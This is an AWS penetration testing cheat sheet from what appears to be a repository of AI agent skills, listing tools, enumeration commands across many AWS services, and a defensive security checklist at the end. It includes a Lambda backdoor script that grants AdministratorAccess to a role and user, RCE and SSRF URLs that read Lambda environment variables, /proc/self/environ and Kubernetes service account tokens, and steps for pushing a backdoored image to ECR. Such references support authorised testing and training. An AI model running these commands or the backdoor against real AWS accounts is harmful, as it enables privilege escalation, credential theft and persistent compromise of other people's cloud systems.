firefrost-gaming/antigravity-skills-reference

Fork 0

Files

sck_0 7f46ed8ca1 Initial commit: The Ultimate Antigravity Skills Collection (58 Skills)

2026-01-14 18:48:08 +01:00

12 KiB

Raw Blame History

Advanced AWS Penetration Testing Reference

Training Resources
Extended Tools Arsenal
AWS API Calls That Return Credentials
Lambda & API Gateway
Secrets Manager & KMS
Container Security (ECS/EKS/ECR)
RDS Database Exploitation
DynamoDB Exploitation
VPC Enumeration & Lateral Movement
Security Checklist

Training Resources

Resource	Description	URL
AWSGoat	Damn Vulnerable AWS Infrastructure	github.com/ine-labs/AWSGoat
Cloudgoat	AWS CTF-style scenario	github.com/RhinoSecurityLabs/cloudgoat
Flaws	AWS security challenge	flaws.cloud
SadCloud	Terraform for vuln AWS	github.com/nccgroup/sadcloud
DVCA	Vulnerable Cloud App	medium.com/poka-techblog

Extended Tools Arsenal

weirdAAL - AWS Attack Library

python3 weirdAAL.py -m ec2_describe_instances -t demo
python3 weirdAAL.py -m lambda_get_account_settings -t demo
python3 weirdAAL.py -m lambda_get_function -a 'MY_LAMBDA_FUNCTION','us-west-2'

cloudmapper - AWS Environment Analyzer

git clone https://github.com/duo-labs/cloudmapper.git
pipenv install --skip-lock
pipenv shell

# Commands
report     # Generate HTML report
iam_report # IAM-specific report
audit      # Check misconfigurations
collect    # Collect account metadata
find_admins # Identify admin users/roles

cloudsplaining - IAM Security Assessment

pip3 install --user cloudsplaining
cloudsplaining download --profile myawsprofile
cloudsplaining scan --input-file default.json

s3_objects_check - S3 Object Permissions

git clone https://github.com/nccgroup/s3_objects_check
python s3-objects-check.py -p whitebox-profile -e blackbox-profile

dufflebag - Find EBS Secrets

# Finds secrets exposed via Amazon EBS's "public" mode
git clone https://github.com/BishopFox/dufflebag

AWS API Calls That Return Credentials

API Call	Description
`chime:createapikey`	Create API key
`codepipeline:pollforjobs`	Poll for jobs
`cognito-identity:getopenidtoken`	Get OpenID token
`cognito-identity:getcredentialsforidentity`	Get identity credentials
`connect:getfederationtoken`	Get federation token
`ecr:getauthorizationtoken`	ECR auth token
`gamelift:requestuploadcredentials`	GameLift upload creds
`iam:createaccesskey`	Create access key
`iam:createloginprofile`	Create login profile
`iam:createservicespecificcredential`	Service-specific creds
`lightsail:getinstanceaccessdetails`	Instance access details
`lightsail:getrelationaldatabasemasteruserpassword`	DB master password
`rds-db:connect`	RDS connect
`redshift:getclustercredentials`	Redshift credentials
`sso:getrolecredentials`	SSO role credentials
`sts:assumerole`	Assume role
`sts:assumerolewithsaml`	Assume role with SAML
`sts:assumerolewithwebidentity`	Web identity assume
`sts:getfederationtoken`	Federation token
`sts:getsessiontoken`	Session token

Lambda & API Gateway

Lambda Enumeration

# List all lambda functions
aws lambda list-functions

# Get function details and download code
aws lambda get-function --function-name FUNCTION_NAME
wget -O lambda-function.zip "url-from-previous-query"

# Get function policy
aws lambda get-policy --function-name FUNCTION_NAME

# List event source mappings
aws lambda list-event-source-mappings --function-name FUNCTION_NAME

# List Lambda layers (dependencies)
aws lambda list-layers
aws lambda get-layer-version --layer-name NAME --version-number VERSION

API Gateway Enumeration

# List REST APIs
aws apigateway get-rest-apis

# Get specific API info
aws apigateway get-rest-api --rest-api-id ID

# List endpoints (resources)
aws apigateway get-resources --rest-api-id ID

# Get method info
aws apigateway get-method --rest-api-id ID --resource-id RES_ID --http-method GET

# List API versions (stages)
aws apigateway get-stages --rest-api-id ID

# List API keys
aws apigateway get-api-keys --include-values

Lambda Credential Access

# Via RCE - get environment variables
https://apigateway/prod/system?cmd=env

# Via SSRF - access runtime API
https://apigateway/prod/example?url=http://localhost:9001/2018-06-01/runtime/invocation/

# Via file read
https://apigateway/prod/system?cmd=file:///proc/self/environ

Lambda Backdooring

# Malicious Lambda code to escalate privileges
import boto3
import json

def handler(event, context):
    iam = boto3.client("iam")
    iam.attach_role_policy(
        RoleName="role_name",
        PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
    )
    iam.attach_user_policy(
        UserName="user_name",
        PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
    )
    return {'statusCode': 200, 'body': json.dumps("Pwned")}

# Update function with backdoor
aws lambda update-function-code --function-name NAME --zip-file fileb://backdoor.zip

# Invoke backdoored function
curl https://API_ID.execute-api.REGION.amazonaws.com/STAGE/ENDPOINT

Secrets Manager & KMS

Secrets Manager Enumeration

# List all secrets
aws secretsmanager list-secrets

# Describe specific secret
aws secretsmanager describe-secret --secret-id NAME

# Get resource policy
aws secretsmanager get-resource-policy --secret-id ID

# Retrieve secret value
aws secretsmanager get-secret-value --secret-id ID

KMS Enumeration

# List KMS keys
aws kms list-keys

# Describe key
aws kms describe-key --key-id ID

# List key policies
aws kms list-key-policies --key-id ID

# Get full policy
aws kms get-key-policy --policy-name NAME --key-id ID

KMS Decryption

# Decrypt file (key info embedded in ciphertext)
aws kms decrypt --ciphertext-blob fileb://EncryptedFile --output text --query plaintext

Container Security (ECS/EKS/ECR)

ECR Enumeration

# List repositories
aws ecr describe-repositories

# Get repository policy
aws ecr get-repository-policy --repository-name NAME

# List images
aws ecr list-images --repository-name NAME

# Describe image
aws ecr describe-images --repository-name NAME --image-ids imageTag=TAG

ECS Enumeration

# List clusters
aws ecs list-clusters

# Describe cluster
aws ecs describe-clusters --cluster NAME

# List services
aws ecs list-services --cluster NAME

# Describe service
aws ecs describe-services --cluster NAME --services SERVICE

# List tasks
aws ecs list-tasks --cluster NAME

# Describe task (shows network info for pivoting)
aws ecs describe-tasks --cluster NAME --tasks TASK_ARN

# List container instances
aws ecs list-container-instances --cluster NAME

EKS Enumeration

# List EKS clusters
aws eks list-clusters

# Describe cluster
aws eks describe-cluster --name NAME

# List node groups
aws eks list-nodegroups --cluster-name NAME

# Describe node group
aws eks describe-nodegroup --cluster-name NAME --nodegroup-name NODE_NAME

# List Fargate profiles
aws eks list-fargate-profiles --cluster-name NAME

Container Backdooring

# Authenticate Docker to ECR
aws ecr get-login-password --region REGION | docker login --username AWS --password-stdin ECR_ADDR

# Build backdoored image
docker build -t image_name .

# Tag for ECR
docker tag image_name ECR_ADDR:IMAGE_NAME

# Push to ECR
docker push ECR_ADDR:IMAGE_NAME

EKS Secrets via RCE

# List Kubernetes secrets
https://website.com/rce.php?cmd=ls /var/run/secrets/kubernetes.io/serviceaccount

# Get service account token
https://website.com/rce.php?cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token

RDS Database Exploitation

RDS Enumeration

# List RDS clusters
aws rds describe-db-clusters

# List RDS instances
aws rds describe-db-instances
# Check: IAMDatabaseAuthenticationEnabled: false = password auth

# List subnet groups
aws rds describe-db-subnet-groups

# List security groups
aws rds describe-db-security-groups

# List proxies
aws rds describe-db-proxies

Password-Based Access

mysql -h HOSTNAME -u USERNAME -P PORT -p

IAM-Based Access

# Generate auth token
TOKEN=$(aws rds generate-db-auth-token \
  --hostname HOSTNAME \
  --port PORT \
  --username USERNAME \
  --region REGION)

# Connect with token
mysql -h HOSTNAME -u USERNAME -P PORT \
  --enable-cleartext-plugin --password=$TOKEN

DynamoDB Exploitation

# List tables
aws dynamodb list-tables

# Scan table contents
aws dynamodb scan --table-name TABLE_NAME | jq -r '.Items[]'

# Query specific items
aws dynamodb query --table-name TABLE_NAME \
  --key-condition-expression "pk = :pk" \
  --expression-attribute-values '{":pk":{"S":"user"}}'

VPC Enumeration & Lateral Movement

VPC Enumeration

# List VPCs
aws ec2 describe-vpcs

# List subnets
aws ec2 describe-subnets --filters "Name=vpc-id,Values=VPC_ID"

# List route tables
aws ec2 describe-route-tables --filters "Name=vpc-id,Values=VPC_ID"

# List Network ACLs
aws ec2 describe-network-acls

# List VPC peering connections
aws ec2 describe-vpc-peering-connections

Route Table Targets

Destination	Target	Description
IP	`local`	VPC internal
IP	`igw`	Internet Gateway
IP	`nat`	NAT Gateway
IP	`pcx`	VPC Peering
IP	`vpce`	VPC Endpoint
IP	`vgw`	VPN Gateway
IP	`eni`	Network Interface

Lateral Movement via VPC Peering

# List peering connections
aws ec2 describe-vpc-peering-connections

# List instances in target VPC
aws ec2 describe-instances --filters "Name=vpc-id,Values=VPC_ID"

# List instances in specific subnet
aws ec2 describe-instances --filters "Name=subnet-id,Values=SUBNET_ID"

Security Checklist

Identity and Access Management

Avoid use of root account
MFA enabled for all IAM users with console access
Disable credentials unused for 90+ days
Rotate access keys every 90 days
Password policy: uppercase, lowercase, symbol, number, 14+ chars
No root access keys exist
MFA enabled for root account
IAM policies attached to groups/roles only

Logging

CloudTrail enabled in all regions
CloudTrail log file validation enabled
CloudTrail S3 bucket not publicly accessible
CloudTrail integrated with CloudWatch Logs
AWS Config enabled in all regions
CloudTrail logs encrypted with KMS
KMS key rotation enabled

Networking

No security groups allow 0.0.0.0/0 to port 22
No security groups allow 0.0.0.0/0 to port 3389
VPC flow logging enabled
Default security group restricts all traffic

Monitoring

Alarm for unauthorized API calls
Alarm for console sign-in without MFA
Alarm for root account usage
Alarm for IAM policy changes
Alarm for CloudTrail config changes
Alarm for console auth failures
Alarm for CMK disabling/deletion
Alarm for S3 bucket policy changes
Alarm for security group changes
Alarm for NACL changes
Alarm for VPC changes

12 KiB Raw Blame History

Advanced AWS Penetration Testing Reference

Table of Contents

Training Resources

Extended Tools Arsenal

weirdAAL - AWS Attack Library

cloudmapper - AWS Environment Analyzer

cloudsplaining - IAM Security Assessment

s3_objects_check - S3 Object Permissions

dufflebag - Find EBS Secrets

AWS API Calls That Return Credentials

Lambda & API Gateway

Lambda Enumeration

API Gateway Enumeration

Lambda Credential Access

Lambda Backdooring

Secrets Manager & KMS

Secrets Manager Enumeration

KMS Enumeration

KMS Decryption

Container Security (ECS/EKS/ECR)

ECR Enumeration

ECS Enumeration

EKS Enumeration

Container Backdooring

EKS Secrets via RCE

RDS Database Exploitation

RDS Enumeration

Password-Based Access

IAM-Based Access

DynamoDB Exploitation

VPC Enumeration & Lateral Movement

VPC Enumeration

Route Table Targets

Lateral Movement via VPC Peering

Security Checklist

Identity and Access Management

Logging

Networking

Monitoring

12 KiB

Raw Blame History